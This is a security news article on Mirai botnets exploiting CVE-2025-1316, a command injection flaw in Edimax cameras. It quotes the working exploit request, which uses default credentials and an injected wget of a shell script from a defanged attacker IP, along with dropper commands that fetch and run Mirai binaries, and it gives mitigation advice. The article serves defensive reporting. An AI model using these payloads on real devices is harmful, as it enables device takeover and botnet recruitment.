Tuesday, May 6, 2025
HomeCyber Security NewsEdimax Camera RCE Vulnerability Exploited to Spread Mirai Malware

Edimax Camera RCE Vulnerability Exploited to Spread Mirai Malware

Published on

SIEM as a Service

Follow Us on Google News

A recent alert from the Akamai Security Intelligence and Response Team (SIRT) has highlighted the exploitation of a severe command injection vulnerability in Edimax Internet of Things (IoT) devices.

This vulnerability, designated as CVE-2025-1316, has been actively used by multiple botnets to spread Mirai malware.

Mirai is notorious for compromising IoT devices and orchestrating distributed denial-of-service (DDoS) attacks.

- Advertisement - Google News

Vulnerability Overview

The CVE-2025-1316 vulnerability targets the /camera-cgi/admin/param.cgi endpoint in Edimax devices, allowing attackers to inject commands into the NTP_serverName option within the ipcamSource parameter.

For successful exploitation, default credentials such as admin:1234 are used. Although the CVE specifically mentions Edimax’s IC-7100 network camera, the vulnerability likely affects a broader range of Edimax devices.

Akamai SIRT first detected activity targeting this vulnerability in their honeypots in early October 2024.

Mirai malware sample main function
Mirai malware sample main function

However, the proof of concept (PoC) exploit dates back to June 2023. The earliest exploit attempts observed were in May 2024, with spikes in September 2024 and January-February 2025.

These attacks were attributed to different botnets, including Mirai variants.

Example Exploit Code

The exploit injects commands to execute a shell script on the device. Here’s an example of the request payload:

/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0

This script downloads and executes a Mirai malware variant for different architectures, such as ARM, MIPS, and x86.

Malware Execution Commands

Once downloaded, the malware is executed through commands like:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

wget http://193.143.1[.]118/x86;

curl -O http://193.143.1[.]118/x86;

cat x86 > OSGt;

chmod +x *;

./OSGt joined;

rm -rf OSGt

Similar commands are used for other architectures like MIPS and ARM.

Mirai Botnets

Two distinct botnets have been identified exploiting this vulnerability:

  1. First Botnet: This botnet uses the exploit to download and execute a curl.sh script. It communicates with the command and control (C2) server via angela.spklove[.]com over port 3093. The malware prints “VagneRHere” upon execution.
  2. Second Botnet: This botnet downloads and runs a wget.sh script, which executes Mirai malware. The malware includes antidebugging functions and prints “Hello, World!” upon execution.

Both botnets exploit several known vulnerabilities, including a Docker API exploit and CVE-2024-7214 affecting TOTOLINK devices.

Mitigation and Recommendations

To protect against these threats:

  • Upgrade Devices: Replace outdated or vulnerable devices with newer models.
  • Change Default Credentials: Ensure all devices use strong, unique passwords.
  • Monitor Networks: Watch for suspicious activity, such as unusual traffic patterns.
  • Implement Security Measures: Use firewalls and intrusion detection systems to block exploit attempts.

As the legacy of Mirai malware continues to impact IoT security, staying informed and proactive is crucial for safeguarding these devices.

The ongoing exploitation of Edimax IoT devices highlights the persistent risks associated with legacy firmware and the pervasive threat of Mirai malware.

Regular monitoring and proactive security strategies are essential in protecting against evolving cyber threats.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free. 

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Google’s NotebookLM Introduces Voice Summaries in Over 50 Languages

Google has significantly expanded the capabilities of NotebookLM, its AI-powered research tool, by introducing...

Android Security Update -A Critical RCE Vulnerability Actively Exploited in the Wild 

Google has released critical security patches for Android devices to address 57 vulnerabilities across...

Hackers Exploit Fake Chrome Error Pages to Deploy Malicious Scripts on Windows Users

Hackers are leveraging a sophisticated social engineering technique dubbed "ClickFix" to trick Windows users...

New ClickFix Attack Imitates Ministry of Defence Website to Target Windows & Linux Systems

A newly identified cyberattack campaign has surfaced, leveraging the recognizable branding of India's Ministry...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Google’s NotebookLM Introduces Voice Summaries in Over 50 Languages

Google has significantly expanded the capabilities of NotebookLM, its AI-powered research tool, by introducing...

Android Security Update -A Critical RCE Vulnerability Actively Exploited in the Wild 

Google has released critical security patches for Android devices to address 57 vulnerabilities across...

Hackers Exploit Fake Chrome Error Pages to Deploy Malicious Scripts on Windows Users

Hackers are leveraging a sophisticated social engineering technique dubbed "ClickFix" to trick Windows users...